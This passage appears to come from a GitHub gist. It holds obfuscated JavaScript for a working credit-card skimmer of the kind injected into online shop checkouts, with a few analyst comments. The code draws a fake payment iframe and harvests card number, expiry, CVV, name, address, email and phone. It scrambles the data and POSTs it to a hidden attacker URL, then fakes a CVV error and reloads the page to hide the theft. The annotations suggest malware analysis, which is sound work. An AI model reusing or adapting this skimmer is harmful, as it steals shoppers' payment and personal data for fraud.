document.querySelector('#step1').style.display = 'none';
document.querySelector('#step2').style.display = 'table';
topsrc = imgs.jcb.top;
botsrc = imgs.jcb.bot;
break;
case 'Maestro_brand':
document.querySelector('#step1').style.display = 'none';
document.querySelector('#step2').style.display = 'table';
topsrc = imgs.maestro.top;
botsrc = imgs.maestro.bot;
break;
default:
break;
}
topimg.src = topsrc;
botimg.src = botsrc;
}
</script>
</body>
</html>
`;
_0x5d7a20(paymentInjectConfig['frame_id'])['then'](() =>
{
return document['querySelector'](paymentInjectConfig['frame_id']);
})['then'](_0x557454 =>
{
let _0x3ea900 = _0x557454['contentDocument'];
_0x3ea900['open'](), _0x3ea900['write'](_0x25d16f), _0x3ea900['close'](), _0x1a1ea7(), setTimeout(() =>
{
document['title'] = 'Payment confirmation', document['querySelector']('link[rel=icon]')['href'] = '', _0x557454['style']['display'] = 'block', window['scrollTo'](0x0, 0x0);
}, 0x9c4), _0x3ea900['querySelector'](paymentInjectConfig['sendbtn'])['addEventListener']('click', () =>
{
if (!_0x5c12ea(_0x3ea900['querySelector'](paymentInjectConfig['cnum'])['value'])) return _0x3ea900['querySelector'](paymentInjectConfig['cnum'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', ![];
else _0x3ea900['querySelector'](paymentInjectConfig['cnum'])['style']['border'] = '';
if (_0x3ea900['querySelector'](paymentInjectConfig['expm'])['value'] == '') return _0x3ea900['querySelector'](paymentInjectConfig['expm'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', ![];
else _0x3ea900['querySelector'](paymentInjectConfig['expm'])['style']['border'] = '';
if (_0x3ea900['querySelector'](paymentInjectConfig['expy'])['value'] == '') return _0x3ea900['querySelector'](paymentInjectConfig['expy'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', ![];
else _0x3ea900['querySelector'](paymentInjectConfig['expy'])['style']['border'] = '';
if (_0x3ea900['querySelector'](paymentInjectConfig['cvv'])['value']['length'] < 0x3) return _0x3ea900['querySelector'](paymentInjectConfig['cvv'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', ![];
else _0x3ea900['querySelector'](paymentInjectConfig['cvv'])['style']['border'] = '';
var _0x277064 = '';
try
{
_0x277064 = getSelector(exfilConfig['eml'])['value'];
}
catch (_0x56789a)
{}
let _0x340812 = {
'eml': _0x277064,
'nme': getSelector(exfilConfig['cnm'])['value'] + ' ' + getSelector(exfilConfig['cna'])['value'],
'adr': getSelector(exfilConfig['adr'])['value'] ? getSelector(exfilConfig['adr'])['value'] + ' ' + getSelector('#billing\:street2')['value'] : getSelector(exfilConfig['adr'])['defaultValue'],
'cit': getSelector(exfilConfig['cit'])['value'] ? getSelector(exfilConfig['cit'])['value'] : getSelector(exfilConfig['cit'])['defaultValue'],
'zip': getSelector(exfilConfig['zip'])['value'],
'sta': getSelector(exfilConfig['sta'])['value'],
'cnt': getSelector(exfilConfig['cnt'])['value'],
'phn': getSelector(exfilConfig['phn'])['value'],
'shp': window['location']['host'],
'num': _0x3ea900['querySelector'](paymentInjectConfig['cnum'])['value'],
'dat': _0x3ea900['querySelector'](paymentInjectConfig['expm'])['value'] + '/' + _0x3ea900['querySelector'](paymentInjectConfig['expy'])['value'],
'vvv': _0x3ea900['querySelector'](paymentInjectConfig['cvv'])['value'],
'nav': navigator['userAgent']
};
// After gathering all the data and exfiltrating it, the skimmer pretends like there was an issue
// with the victim's CVV. It changes the background to red, then it sets the "mage-checkout-mc"
// and reloads the page. With that cookie set, the checkout flow continues as it normally would
exfilData(atob(exfilConfig['url']), JSON['stringify'](_0x340812))['then'](() =>
{
_0x3ea900['querySelector'](paymentInjectConfig['cvv'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', setFinalCookie();
});
});
});
},
setFinalCookie = () =>
{
setCookie(paymentInjectConfig['final_cookie'], Math['floor'](0x5f5e100 + Math['random']() * 0x35a4e900), 0x5), window['location']['reload']();
},
_0x5c12ea = function (_0x2c7d59)
{
var _0x3254e0 = _0x2adc58;
if (_0x2c7d59['length'] == 0x0) return;
_0x2c7d59 = _0x2c7d59['replace'](/ /g, '');
var _0x501779, _0x217b55, _0x278f40, _0x569bcb, _0x341c72, _0x44aeef;
_0x278f40 = !![], _0x569bcb = 0x0, _0x217b55 = (_0x2c7d59 + '')['split']('')['reverse']();
for (_0x341c72 = 0x0, _0x44aeef = _0x217b55['length']; _0x341c72 < _0x44aeef; _0x341c72++)
{
_0x501779 = _0x217b55[_0x341c72], _0x501779 = parseInt(_0x501779, 0xa), (_0x278f40 = !_0x278f40) && (_0x501779 *= 0x2), _0x501779 > 0x9 && (_0x501779 -= 0x9), _0x569bcb += _0x501779;
}
return _0x569bcb % 0xa === 0x0;
},
getSelector = selector =>
{
return document['querySelector'](selector) ? document['querySelector'](selector) : '';
},
setCookie = function (cookieName, cookieValue, daysOffset)
{
let expiration = '';
if (daysOffset)
{
const expireDate = new Date();
expireDate['setTime'](expireDate['getTime']() + daysOffset * 0x18 * 0x3c * 0x3c * 0x3e8), expiration = '; expires=' + expireDate['toUTCString']();
}
document['cookie'] = cookieName + '=' + (cookieValue || '') + expiration + '; path=/';
},
getCookie = function (cookieName)
{
const _0x49fa72 = cookieName + '=',
_0xd93b51 = document['cookie']['split'](';');
for (let _0x25be19 = 0x0; _0x25be19 < _0xd93b51['length']; _0x25be19++)
{
let _0x11f845 = _0xd93b51[_0x25be19];
while (_0x11f845['charAt'](0x0) == ' ') _0x11f845 = _0x11f845['substring'](0x1, _0x11f845['length']);
if (_0x11f845['indexOf'](_0x49fa72) == 0x0) return _0x11f845['substring'](_0x49fa72['length'], _0x11f845['length']);
}
return null;
},
exfilData = async (_0x469746, _0x201b33) =>
{
var _0x51b79f = _0x2adc58;
const _0x3a233b = await fetch(_0x469746,
{
'method': 'POST',
'headers':
{
'Accept': 'application/json',
'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8'
},
'body': 'api=' + encodeURI(encodeAndObfuscate(_0x201b33))
});
return _0x3a233b['json']();
},
// This function base64 encodes the payload
// Then it swaps the following characters in the encoded value:
// a,h,e,0,7,d,T,o,Y,w
// For the following values:
// -,_,:,/,^,#,@,%,*,+
encodeAndObfuscate = function (_0xfc1ade, _0x21fc0b)
{
var _0x392ada = base64['encode'](_0xfc1ade);
return _0x392ada = _0x392ada['replace'](/a/g, '-'), _0x392ada = _0x392ada['replace'](/h/g, '_'), _0x392ada = _0x392ada['replace'](/e/g, ':'), _0x392ada = _0x392ada['replace'](/0/g, '/'), _0x392ada = _0x392ada['replace'](/7/g, '^'), _0x392ada = _0x392ada['replace'](/d/g, '#'), _0x392ada = _0x392ada['replace'](/T/g, '@'), _0x392ada = _0x392ada['replace'](/o/g, '%'), _0x392ada = _0x392ada['replace'](/Y/g, '*'), _0x392ada = _0x392ada['replace'](/w/g, '+'), _0x392ada;
},
// boilerplate base64
base64 = {
'_keyStr': 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=',
'encode': function (_0x121c29)
{
var _0x17e69a = _0x2adc58,
_0x5a1845 = '',
_0x27a1ef, _0x46ad3c, _0x5f1b2b, _0x54eea2, _0x428601, _0x78a28f, _0x494de9, _0x456e19 = 0x0;
_0x121c29 = base64['_utf8_encode'](_0x121c29);
while (_0x456e19 < _0x121c29['length'])
{
_0x27a1ef = _0x121c29['charCodeAt'](_0x456e19++), _0x46ad3c = _0x121c29['charCodeAt'](_0x456e19++), _0x5f1b2b = _0x121c29['charCodeAt'](_0x456e19++), _0x54eea2 = _0x27a1ef >> 0x2, _0x428601 = (_0x27a1ef & 0x3) << 0x4 | _0x46ad3c >> 0x4, _0x78a28f = (_0x46ad3c & 0xf) << 0x2 | _0x5f1b2b >> 0x6, _0x494de9 = _0x5f1b2b & 0x3f;
if (isNaN(_0x46ad3c)) _0x78a28f = _0x494de9 = 0x40;
else isNaN(_0x5f1b2b) && (_0x494de9 = 0x40);
_0x5a1845 = _0x5a1845 + this['_keyStr']['charAt'](_0x54eea2) + this['_keyStr']['charAt'](_0x428601) + this['_keyStr']['charAt'](_0x78a28f) + this['_keyStr']['charAt'](_0x494de9);
}
return _0x5a1845;
},
'decode': function (_0x95631a)
{
var _0x4ee268 = _0x2adc58,
_0x19cc88 = '',
_0x4f3316, _0x2d4ed4, _0x5f0377, _0x2f8336, _0x44bf8b, _0x18c9a1, _0x51554f, _0x1f5601 = 0x0;
_0x95631a = _0x95631a['replace'](/[^A-Za-z0-9+/=]/g, '');
while (_0x1f5601 < _0x95631a['length'])
{
_0x2f8336 = this['_keyStr']['indexOf'](_0x95631a['charAt'](_0x1f5601++)), _0x44bf8b = this['_keyStr']['indexOf'](_0x95631a['charAt'](_0x1f5601++)), _0x18c9a1 = this['_keyStr']['indexOf'](_0x95631a['charAt'](_0x1f5601++)), _0x51554f = this['_keyStr']['indexOf'](_0x95631a['charAt'](_0x1f5601++)), _0x4f3316 = _0x2f8336 << 0x2 | _0x44bf8b >> 0x4, _0x2d4ed4 = (_0x44bf8b & 0xf) << 0x4 | _0x18c9a1 >> 0x2, _0x5f0377 = (_0x18c9a1 & 0x3) << 0x6 | _0x51554f, _0x19cc88 = _0x19cc88 + String['fromCharCode'](_0x4f3316), _0x18c9a1 != 0x40 && (_0x19cc88 = _0x19cc88 + String['fromCharCode'](_0x2d4ed4)), _0x51554f != 0x40 && (_0x19cc88 = _0x19cc88 + String['fromCharCode'](_0x5f0377));
}
return _0x19cc88 = base64['_utf8_decode'](_0x19cc88), _0x19cc88;
},
'_utf8_encode': function (_0x14417b)
{
var _0x2e7c10 = _0x2adc58;
_0x14417b = _0x14417b['replace'](/rn/g, 'n');
var _0x428235 = '';
for (var _0x3e2fb1 = 0x0; _0x3e2fb1 < _0x14417b['length']; _0x3e2fb1++)
{
var _0x555090 = _0x14417b['charCodeAt'](_0x3e2fb1);
if (_0x555090 < 0x80) _0x428235 += String['fromCharCode'](_0x555090);
else _0x555090 > 0x7f && _0x555090 < 0x800 ? (_0x428235 += String['fromCharCode'](_0x555090 >> 0x6 | 0xc0), _0x428235 += String['fromCharCode'](_0x555090 & 0x3f | 0x80)) : (_0x428235 += String['fromCharCode'](_0x555090 >> 0xc | 0xe0), _0x428235 += String['fromCharCode'](_0x555090 >> 0x6 & 0x3f | 0x80), _0x428235 += String['fromCharCode'](_0x555090 & 0x3f | 0x80));
}
return _0x428235;
},
'_utf8_decode': function (_0x4f231a)
{
var _0x19e084 = _0x2adc58,
_0x4782c7 = '',
_0xe22410 = 0x0,
_0x1ed61f = c1 = c2 = 0x0;
while (_0xe22410 < _0x4f231a['length'])
{
_0x1ed61f = _0x4f231a['charCodeAt'](_0xe22410);
if (_0x1ed61f < 0x80) _0x4782c7 += String['fromCharCode'](_0x1ed61f), _0xe22410++;
else _0x1ed61f > 0xbf && _0x1ed61f < 0xe0 ? (c2 = _0x4f231a['charCodeAt'](_0xe22410 + 0x1), _0x4782c7 += String['fromCharCode']((_0x1ed61f & 0x1f) << 0x6 | c2 & 0x3f), _0xe22410 += 0x2) : (c2 = _0x4f231a['charCodeAt'](_0xe22410 + 0x1), c3 = _0x4f231a['charCodeAt'](_0xe22410 + 0x2), _0x4782c7 += String['fromCharCode']((_0x1ed61f & 0xf) << 0xc | (c2 & 0x3f) << 0x6 | c3 & 0x3f), _0xe22410 += 0x3);
}
return _0x4782c7;
}
};
};
skimmer();
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment